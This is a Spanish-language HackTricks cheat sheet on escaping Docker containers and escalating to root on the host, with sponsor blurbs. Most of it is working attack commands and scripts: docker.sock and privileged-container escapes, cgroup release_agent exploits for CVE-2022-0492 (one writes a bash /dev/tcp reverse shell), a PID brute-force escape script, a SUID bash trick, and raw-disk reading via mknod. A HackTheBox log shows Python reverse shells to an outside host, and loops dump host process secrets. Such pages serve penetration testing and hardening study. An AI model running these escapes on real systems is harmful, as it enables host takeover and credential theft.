Docker Breakout / Privilege Escalation

Apoya a HackTricks

Utiliza Trickest para construir y automatizar flujos de trabajo fácilmente con las herramientas comunitarias más avanzadas del mundo. ¡Accede hoy mismo:

Enumeración y Escape Automáticos

  • linpeas: También puede enumerar contenedores

  • CDK: Esta herramienta es bastante útil para enumerar el contenedor en el que te encuentras e intentar escapar automáticamente

  • amicontained: Herramienta útil para obtener los privilegios que tiene el contenedor con el fin de encontrar formas de escapar de él

  • deepce: Herramienta para enumerar y escapar de contenedores

  • grype: Obtiene los CVE contenidos en el software instalado en la imagen

Escape del Socket de Docker Montado

Si de alguna manera descubres que el socket de Docker está montado dentro del contenedor de Docker, podrás escapar de él. Esto suele ocurrir en contenedores de Docker que por alguna razón necesitan conectarse al daemon de Docker para realizar acciones.

#Search the socket
find / -name docker.sock 2>/dev/null
#It's usually in /run/docker.sock

En este caso, puedes usar comandos regulares de docker para comunicarte con el demonio de docker:

#List images to use one
docker images
#Run the image mounting the host disk and chroot on it
docker run -it -v /:/host/ ubuntu:18.04 chroot /host/ bash

# Get full access to the host via ns pid and nsenter cli
docker run -it --rm --pid=host --privileged ubuntu bash
nsenter --target 1 --mount --uts --ipc --net --pid -- bash

# Get full privs in container without --privileged
docker run -it -v /:/host/ --cap-add=ALL --security-opt apparmor=unconfined --security-opt seccomp=unconfined --security-opt label:disable --pid=host --userns=host --uts=host --cgroupns=host ubuntu chroot /host/ bash

En caso de que el socket de docker esté en un lugar inesperado, aún puedes comunicarte con él usando el comando docker con el parámetro -H unix:///ruta/al/docker.sock

El daemon de Docker también podría estar escuchando en un puerto (por defecto 2375, 2376) o en sistemas basados en Systemd, la comunicación con el daemon de Docker puede ocurrir a través del socket de Systemd fd://.

Además, presta atención a los sockets de tiempo de ejecución de otros tiempos de ejecución de alto nivel:

  • dockershim: unix:///var/run/dockershim.sock

  • containerd: unix:///run/containerd/containerd.sock

  • cri-o: unix:///var/run/crio/crio.sock

  • frakti: unix:///var/run/frakti.sock

  • rktlet: unix:///var/run/rktlet.sock

  • ...

Escape de Abuso de Capacidades

Deberías verificar las capacidades del contenedor, si tiene alguna de las siguientes, podrías ser capaz de escapar de él: CAP_SYS_ADMIN, CAP_SYS_PTRACE, CAP_SYS_MODULE, DAC_READ_SEARCH, DAC_OVERRIDE, CAP_SYS_RAWIO, CAP_SYSLOG, CAP_NET_RAW, CAP_NET_ADMIN

Puedes verificar las capacidades actuales del contenedor usando las herramientas automáticas mencionadas anteriormente o:

capsh --print

En la siguiente página puedes aprender más sobre las capacidades de Linux y cómo abusar de ellas para escapar/elevar privilegios:

Escapar de Contenedores con Privilegios

Un contenedor con privilegios puede crearse con la bandera --privileged o deshabilitando defensas específicas:

  • --cap-add=ALL

  • --security-opt apparmor=unconfined

  • --security-opt seccomp=unconfined

  • --security-opt label:disable

  • --pid=host

  • --userns=host

  • --uts=host

  • --cgroupns=host

  • Montar /dev

La bandera --privileged disminuye significativamente la seguridad del contenedor, ofreciendo acceso irrestricto a dispositivos y eludir varias protecciones. Para obtener un desglose detallado, consulta la documentación sobre los impactos completos de --privileged.

Privileged + hostPID

Con estos permisos, puedes simplemente moverte al espacio de nombres de un proceso en ejecución en el host como root como init (pid:1) simplemente ejecutando: nsenter --target 1 --mount --uts --ipc --net --pid -- bash

Pruébalo en un contenedor ejecutando:

docker run --rm -it --pid=host --privileged ubuntu bash

Privileged

Solo con la bandera privileged puedes intentar acceder al disco del host o intentar escapar abusando de release_agent u otros escapes.

Prueba los siguientes bypasses en un contenedor ejecutando:

docker run --rm -it --privileged ubuntu bash

Montaje de Disco - Poc1

Los contenedores de Docker bien configurados no permitirán comandos como fdisk -l. Sin embargo, en un contenedor de Docker mal configurado donde se especifique la bandera --privileged o --device=/dev/sda1 con capacidades, es posible obtener los privilegios para ver la unidad del host.

Por lo tanto, para tomar el control de la máquina host, es trivial:

mkdir -p /mnt/hola
mount /dev/sda1 /mnt/hola

Y voilà! Ahora puedes acceder al sistema de archivos del host porque está montado en la carpeta /mnt/hola.

Montaje de Disco - Poc2

Dentro del contenedor, un atacante puede intentar obtener un mayor acceso al sistema operativo subyacente del host a través de un volumen hostPath escribible creado por el clúster. A continuación se muestran algunas cosas comunes que puedes verificar dentro del contenedor para ver si puedes aprovechar este vector de ataque:

### Check if You Can Write to a File-system
echo 1 > /proc/sysrq-trigger

### Check root UUID
cat /proc/cmdline
BOOT_IMAGE=/boot/vmlinuz-4.4.0-197-generic root=UUID=b2e62f4f-d338-470e-9ae7-4fc0e014858c ro console=tty1 console=ttyS0 earlyprintk=ttyS0 rootdelay=300

# Check Underlying Host Filesystem
findfs UUID=<UUID Value>
/dev/sda1

# Attempt to Mount the Host's Filesystem
mkdir /mnt-test
mount /dev/sda1 /mnt-test
mount: /mnt: permission denied. ---> Failed! but if not, you may have access to the underlying host OS file-system now.

### debugfs (Interactive File System Debugger)
debugfs /dev/sda1

Escape de privilegios Abusando del release_agent existente (cve-2022-0492) - PoC1

PoC inicial
# spawn a new container to exploit via:
# docker run --rm -it --privileged ubuntu bash

# Finds + enables a cgroup release_agent
# Looks for something like: /sys/fs/cgroup/*/release_agent
d=`dirname $(ls -x /s*/fs/c*/*/r* |head -n1)`
# If "d" is empty, this won't work, you need to use the next PoC

# Enables notify_on_release in the cgroup
mkdir -p $d/w;
echo 1 >$d/w/notify_on_release
# If you have a "Read-only file system" error, you need to use the next PoC

# Finds path of OverlayFS mount for container
# Unless the configuration explicitly exposes the mount point of the host filesystem
# see https://ajxchapman.github.io/containers/2020/11/19/privileged-container-escape.html
t=`sed -n 's/overlay \/ .*\perdir=\([^,]*\).*/\1/p' /etc/mtab`

# Sets release_agent to /path/payload
touch /o; echo $t/c > $d/release_agent

# Creates a payload
echo "#!/bin/sh" > /c
echo "ps > $t/o" >> /c
chmod +x /c

# Triggers the cgroup via empty cgroup.procs
sh -c "echo 0 > $d/w/cgroup.procs"; sleep 1

# Reads the output
cat /o

Escape de privilegios abusando del release_agent creado (cve-2022-0492) - PoC2

Segundo PoC
# On the host
docker run --rm -it --cap-add=SYS_ADMIN --security-opt apparmor=unconfined ubuntu bash

# Mounts the RDMA cgroup controller and create a child cgroup
# This technique should work with the majority of cgroup controllers
# If you're following along and get "mount: /tmp/cgrp: special device cgroup does not exist"
# It's because your setup doesn't have the RDMA cgroup controller, try change rdma to memory to fix it
mkdir /tmp/cgrp && mount -t cgroup -o rdma cgroup /tmp/cgrp && mkdir /tmp/cgrp/x
# If mount gives an error, this won't work, you need to use the first PoC

# Enables cgroup notifications on release of the "x" cgroup
echo 1 > /tmp/cgrp/x/notify_on_release

# Finds path of OverlayFS mount for container
# Unless the configuration explicitly exposes the mount point of the host filesystem
# see https://ajxchapman.github.io/containers/2020/11/19/privileged-container-escape.html
host_path=`sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab`

# Sets release_agent to /path/payload
echo "$host_path/cmd" > /tmp/cgrp/release_agent

#For a normal PoC =================
echo '#!/bin/sh' > /cmd
echo "ps aux > $host_path/output" >> /cmd
chmod a+x /cmd
#===================================
#Reverse shell
echo '#!/bin/bash' > /cmd
echo "bash -i >& /dev/tcp/172.17.0.1/9000 0>&1" >> /cmd
chmod a+x /cmd
#===================================

# Executes the attack by spawning a process that immediately ends inside the "x" child cgroup
# By creating a /bin/sh process and writing its PID to the cgroup.procs file in "x" child cgroup directory
# The script on the host will execute after /bin/sh exits
sh -c "echo \$\$ > /tmp/cgrp/x/cgroup.procs"

# Reads the output
cat /output

Encuentra una explicación de la técnica en:

Escape de privilegios abusando de release_agent sin conocer la ruta relativa - PoC3

En los exploits anteriores se revela la ruta absoluta del contenedor dentro del sistema de archivos del host. Sin embargo, esto no siempre es el caso. En situaciones donde no conoces la ruta absoluta del contenedor dentro del host puedes utilizar esta técnica:

#!/bin/sh

OUTPUT_DIR="/"
MAX_PID=65535
CGROUP_NAME="xyx"
CGROUP_MOUNT="/tmp/cgrp"
PAYLOAD_NAME="${CGROUP_NAME}_payload.sh"
PAYLOAD_PATH="${OUTPUT_DIR}/${PAYLOAD_NAME}"
OUTPUT_NAME="${CGROUP_NAME}_payload.out"
OUTPUT_PATH="${OUTPUT_DIR}/${OUTPUT_NAME}"

# Run a process for which we can search for (not needed in reality, but nice to have)
sleep 10000 &

# Prepare the payload script to execute on the host
cat > ${PAYLOAD_PATH} << __EOF__
#!/bin/sh

OUTPATH=\$(dirname \$0)/${OUTPUT_NAME}

# Commands to run on the host<
ps -eaf > \${OUTPATH} 2>&1
__EOF__

# Make the payload script executable
chmod a+x ${PAYLOAD_PATH}

# Set up the cgroup mount using the memory resource cgroup controller
mkdir ${CGROUP_MOUNT}
mount -t cgroup -o memory cgroup ${CGROUP_MOUNT}
mkdir ${CGROUP_MOUNT}/${CGROUP_NAME}
echo 1 > ${CGROUP_MOUNT}/${CGROUP_NAME}/notify_on_release

# Brute force the host pid until the output path is created, or we run out of guesses
TPID=1
while [ ! -f ${OUTPUT_PATH} ]
do
if [ $((${TPID} % 100)) -eq 0 ]
then
echo "Checking pid ${TPID}"
if [ ${TPID} -gt ${MAX_PID} ]
then
echo "Exiting at ${MAX_PID} :-("
exit 1
fi
fi
# Set the release_agent path to the guessed pid
echo "/proc/${TPID}/root${PAYLOAD_PATH}" > ${CGROUP_MOUNT}/release_agent
# Trigger execution of the release_agent
sh -c "echo \$\$ > ${CGROUP_MOUNT}/${CGROUP_NAME}/cgroup.procs"
TPID=$((${TPID} + 1))
done

# Wait for and cat the output
sleep 1
echo "Done! Output:"
cat ${OUTPUT_PATH}

Ejecutar el PoC dentro de un contenedor privilegiado debería proporcionar una salida similar a:

root@container:~$ ./release_agent_pid_brute.sh
Checking pid 100
Checking pid 200
Checking pid 300
Checking pid 400
Checking pid 500
Checking pid 600
Checking pid 700
Checking pid 800
Checking pid 900
Checking pid 1000
Checking pid 1100
Checking pid 1200

Done! Output:
UID        PID  PPID  C STIME TTY          TIME CMD
root         1     0  0 11:25 ?        00:00:01 /sbin/init
root         2     0  0 11:25 ?        00:00:00 [kthreadd]
root         3     2  0 11:25 ?        00:00:00 [rcu_gp]
root         4     2  0 11:25 ?        00:00:00 [rcu_par_gp]
root         5     2  0 11:25 ?        00:00:00 [kworker/0:0-events]
root         6     2  0 11:25 ?        00:00:00 [kworker/0:0H-kblockd]
root         9     2  0 11:25 ?        00:00:00 [mm_percpu_wq]
root        10     2  0 11:25 ?        00:00:00 [ksoftirqd/0]
...

Escapar de Privilegios Abusando de Montajes Sensibles

Existen varios archivos que podrían estar montados y que proporcionan información sobre el host subyacente. Algunos de ellos incluso pueden indicar algo que debe ser ejecutado por el host cuando ocurre algo (lo que permitiría a un atacante escapar del contenedor). El abuso de estos archivos puede permitir que:

Sin embargo, puedes encontrar otros archivos sensibles para verificar en esta página:

Montajes Arbitrarios

En varias ocasiones encontrarás que el contenedor tiene algún volumen montado desde el host. Si este volumen no se configuró correctamente, podrías ser capaz de acceder/modificar datos sensibles: Leer secretos, cambiar ssh authorized_keys...

docker run --rm -it -v /:/host ubuntu bash

Escalada de privilegios con 2 shells y montaje de host

Si tienes acceso como root dentro de un contenedor que tiene alguna carpeta del host montada y has escapado como un usuario no privilegiado al host y tienes acceso de lectura sobre la carpeta montada. Puedes crear un archivo bash suid en la carpeta montada dentro del contenedor y ejecutarlo desde el host para la escalada de privilegios.

cp /bin/bash . #From non priv inside mounted folder
# You need to copy it from the host as the bash binaries might be diferent in the host and in the container
chown root:root bash #From container as root inside mounted folder
chmod 4777 bash #From container as root inside mounted folder
bash -p #From non priv inside mounted folder

Escalada de privilegios con 2 shells

Si tienes acceso como root dentro de un contenedor y has escapado como un usuario no privilegiado al host, puedes abusar de ambos shells para elevar privilegios dentro del host si tienes la capacidad MKNOD dentro del contenedor (por defecto) como se explica en esta publicación. Con dicha capacidad, el usuario root dentro del contenedor tiene permiso para crear archivos de dispositivos de bloques. Los archivos de dispositivos son archivos especiales que se utilizan para acceder al hardware subyacente y a los módulos del kernel. Por ejemplo, el archivo de dispositivo de bloques /dev/sda proporciona acceso para leer los datos crudos en el disco del sistema.

Docker se protege contra el mal uso de dispositivos de bloques dentro de los contenedores haciendo cumplir una política de cgroups que bloquea las operaciones de lectura/escritura de dispositivos de bloques. Sin embargo, si se crea un dispositivo de bloques dentro del contenedor, se vuelve accesible desde fuera del contenedor a través del directorio /proc/PID/root/. Este acceso requiere que el propietario del proceso sea el mismo tanto dentro como fuera del contenedor.

Ejemplo de explotación de este informe:

# On the container as root
cd /
# Crate device
mknod sda b 8 0
# Give access to it
chmod 777 sda

# Create the nonepriv user of the host inside the container
## In this case it's called augustus (like the user from the host)
echo "augustus:x:1000:1000:augustus,,,:/home/augustus:/bin/bash" >> /etc/passwd
# Get a shell as augustus inside the container
su augustus
su: Authentication failure
(Ignored)
augustus@3a453ab39d3d:/backend$ /bin/sh
/bin/sh
$
# On the host

# get the real PID of the shell inside the container as the new https://app.gitbook.com/s/-L_2uGJGU7AVNRcqRvEi/~/changes/3847/linux-hardening/privilege-escalation/docker-breakout/docker-breakout-privilege-escalation#privilege-escalation-with-2-shells user
augustus@GoodGames:~$ ps -auxf | grep /bin/sh
root      1496  0.0  0.0   4292   744 ?        S    09:30   0:00      \_ /bin/sh -c python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.12",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("sh")'
root      1627  0.0  0.0   4292   756 ?        S    09:44   0:00      \_ /bin/sh -c python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.12",4445));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("sh")'
augustus  1659  0.0  0.0   4292   712 ?        S+   09:48   0:00                          \_ /bin/sh
augustus  1661  0.0  0.0   6116   648 pts/0    S+   09:48   0:00              \_ grep /bin/sh

# The process ID is 1659 in this case
# Grep for the sda for HTB{ through the process:
augustus@GoodGames:~$ grep -a 'HTB{' /proc/1659/root/sda
HTB{7h4T_w45_Tr1cKy_1_D4r3_54y}

hostPID

Si puedes acceder a los procesos del host, podrás acceder a mucha información sensible almacenada en esos procesos. Ejecuta el laboratorio de pruebas:

docker run --rm -it --pid=host ubuntu bash

Por ejemplo, podrás listar los procesos usando algo como ps auxn y buscar detalles sensibles en los comandos.

Luego, como puedes acceder a cada proceso del host en /proc/, simplemente puedes robar sus secretos de entorno ejecutando:

for e in `ls /proc/*/environ`; do echo; echo $e; xargs -0 -L1 -a $e; done
/proc/988058/environ
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
HOSTNAME=argocd-server-69678b4f65-6mmql
USER=abrgocd
...

También puedes acceder a los descriptores de archivos de otros procesos y leer sus archivos abiertos:

for fd in `find /proc/*/fd`; do ls -al $fd/* 2>/dev/null | grep \>; done > fds.txt
less fds.txt
...omitted for brevity...
lrwx------ 1 root root 64 Jun 15 02:25 /proc/635813/fd/2 -> /dev/pts/0
lrwx------ 1 root root 64 Jun 15 02:25 /proc/635813/fd/4 -> /.secret.txt.swp
# You can open the secret filw with:
cat /proc/635813/fd/4

También puedes matar procesos y causar un DoS.

Si de alguna manera tienes acceso privilegiado sobre un proceso fuera del contenedor, podrías ejecutar algo como nsenter --target <pid> --all o nsenter --target <pid> --mount --net --pid --cgroup para ejecutar un shell con las mismas restricciones ns (con suerte ninguna) que ese proceso.

hostNetwork

docker run --rm -it --network=host ubuntu bash

Si un contenedor se configuró con el controlador de red del host de Docker (--network=host), la pila de red de ese contenedor no está aislada del host de Docker (el contenedor comparte el espacio de nombres de red del host) y el contenedor no recibe su propia dirección IP asignada. En otras palabras, el contenedor enlaza todos los servicios directamente a la IP del host. Además, el contenedor puede interceptar TODO el tráfico de red que el host está enviando y recibiendo en la interfaz compartida tcpdump -i eth0.

Por ejemplo, puedes usar esto para espiar e incluso falsificar tráfico entre el host y la instancia de metadatos.

Como en los siguientes ejemplos:

También podrás acceder a servicios de red enlazados a localhost dentro del host o incluso acceder a los permisos de metadatos del nodo (que podrían ser diferentes a los que un contenedor puede acceder).

hostIPC

docker run --rm -it --ipc=host ubuntu bash

Con hostIPC=true, se obtiene acceso a los recursos de comunicación entre procesos (IPC) del host, como la memoria compartida en /dev/shm. Esto permite leer/escribir donde los mismos recursos IPC son utilizados por otros procesos del host o del pod. Usa ipcs para inspeccionar estos mecanismos IPC.

  • Inspeccionar /dev/shm - Busca archivos en esta ubicación de memoria compartida: ls -la /dev/shm

  • Inspeccionar las instalaciones IPC existentes - Puedes verificar si se están utilizando instalaciones IPC con /usr/bin/ipcs. Verifícalo con: ipcs -a

Recuperar capacidades

Si la llamada al sistema unshare no está prohibida, puedes recuperar todas las capacidades ejecutando:

unshare -UrmCpf bash
# Check them with
cat /proc/self/status | grep CapEff

Abuso de espacio de nombres de usuario a través de enlaces simbólicos

La segunda técnica explicada en la publicación https://labs.withsecure.com/blog/abusing-the-access-to-mount-namespaces-through-procpidroot/ indica cómo se puede abusar de los enlaces de montaje con espacios de nombres de usuario, para afectar archivos dentro del host (en ese caso específico, eliminar archivos).

Utiliza Trickest para construir fácilmente y automatizar flujos de trabajo impulsados por las herramientas comunitarias más avanzadas del mundo. Obtén acceso hoy:

CVEs

Exploit de Runc (CVE-2019-5736)

En caso de que puedas ejecutar docker exec como root (probablemente con sudo), intenta escalar privilegios escapando de un contenedor abusando de CVE-2019-5736 (exploit aquí). Esta técnica básicamente sobrescribirá el binario /bin/sh del host desde un contenedor, por lo que cualquiera que ejecute docker exec puede activar el payload.

Cambia el payload según sea necesario y compila el main.go con go build main.go. El binario resultante debe colocarse en el contenedor de Docker para su ejecución. Al ejecutarlo, tan pronto como muestre [+] Sobrescrito /bin/sh con éxito, debes ejecutar lo siguiente desde la máquina host:

docker exec -it <nombre-contenedor> /bin/sh

Esto activará el payload que está presente en el archivo main.go.

Para más información: https://blog.dragonsector.pl/2019/02/cve-2019-5736-escape-from-docker-and.html

Existen otras CVEs a las que el contenedor puede ser vulnerable, puedes encontrar una lista en https://0xn3va.gitbook.io/cheat-sheets/container/escaping/cve-list

Escape Personalizado de Docker

Superficie de Escape de Docker

  • Espacios de nombres: El proceso debe estar completamente separado de otros procesos a través de espacios de nombres, por lo que no podemos escapar interactuando con otros procesos debido a los espacios de nombres (por defecto no se puede comunicar a través de IPCs, sockets unix, servicios de red, D-Bus, /proc de otros procesos).

  • Usuario root: Por defecto, el usuario que ejecuta el proceso es el usuario root (sin embargo, sus privilegios están limitados).

  • Capacidades: Docker deja las siguientes capacidades: cap_chown,cap_dac_override,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_net_bind_service,cap_net_raw,cap_sys_chroot,cap_mknod,cap_audit_write,cap_setfcap=ep

  • Syscalls: Estas son las syscalls que el usuario root no podrá llamar (debido a la falta de capacidades + Seccomp). Las otras syscalls podrían ser utilizadas para intentar escapar.

0x067 -- syslog
0x070 -- setsid
0x09b -- pivot_root
0x0a3 -- acct
0x0a4 -- settimeofday
0x0a7 -- swapon
0x0a8 -- swapoff
0x0aa -- sethostname
0x0ab -- setdomainname
0x0af -- init_module
0x0b0 -- delete_module
0x0d4 -- lookup_dcookie
0x0f6 -- kexec_load
0x12c -- fanotify_init
0x130 -- open_by_handle_at
0x139 -- finit_module
0x140 -- kexec_file_load
0x141 -- bpf